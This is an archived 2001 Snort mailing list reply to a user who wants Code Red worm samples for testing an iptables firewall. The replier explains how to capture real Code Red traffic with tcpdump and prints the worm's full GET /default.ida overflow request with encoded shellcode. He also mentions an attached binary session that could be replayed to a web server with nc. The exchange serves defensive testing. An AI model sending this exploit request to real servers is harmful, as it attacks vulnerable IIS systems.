Snort mailing list archives
Re: Where to get " code red worm source" ?
From: Phil Wood <cpw () lanl gov>
Date: Wed, 29 Aug 2001 11:50:49 -0600
On Wed, Aug 29, 2001 at 01:44:33PM +0900, ls1100 wrote:
I'd like to testing own my linux firewalls using iptables aganist Code-Red-worm Anybody know, Where to get " code red worm source" ?
What I do is just run: tcpdump -s 1518 -w codeRed -c 100 dst net mynet and dst port 80 In less than a second, I have 5 examples. Each one has the following "string" among other things: GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Since 8/13 we have had rougly 25+ million codereds. Today (last 11 hours and 39 minutes) we have had 878,589. I just don't see how you could miss getting one for yourself. %^) I extracted one of the "sessions" in binary which you could pipe to a web server using nc. -- Phil Wood, cpw () lanl gov
Attachment:
cr.bin
Description:
Current thread:
- Where to get " code red worm source" ? ls1100 (Aug 28)
- Re: Where to get " code red worm source" ? Phil Wood (Aug 29)
- Re: Where to get " code red worm source" ? Daniel Monjar (Aug 29)
- Re: Where to get " code red worm source" ? Phil Wood (Aug 29)
- Re: Where to get " code red worm source" ? Daniel Monjar (Aug 29)
- <Possible follow-ups>
- FW: Where to get " code red worm source" ? Martin O'Reilly (Aug 29)
- RE: Where to get " code red worm source" ? Mel Chandler PMI (Aug 30)
- Re: Where to get " code red worm source" ? Olaf Schreck (Aug 30)
- Re: Where to get " code red worm source" ? Phil Wood (Aug 30)
- Re: Where to get " code red worm source" ? Ryan Russell (Aug 30)
- Message not available
- Re: hi ^^ I have question ^^ Phil Wood (Aug 31)
- Re: Where to get " code red worm source" ? Phil Wood (Aug 29)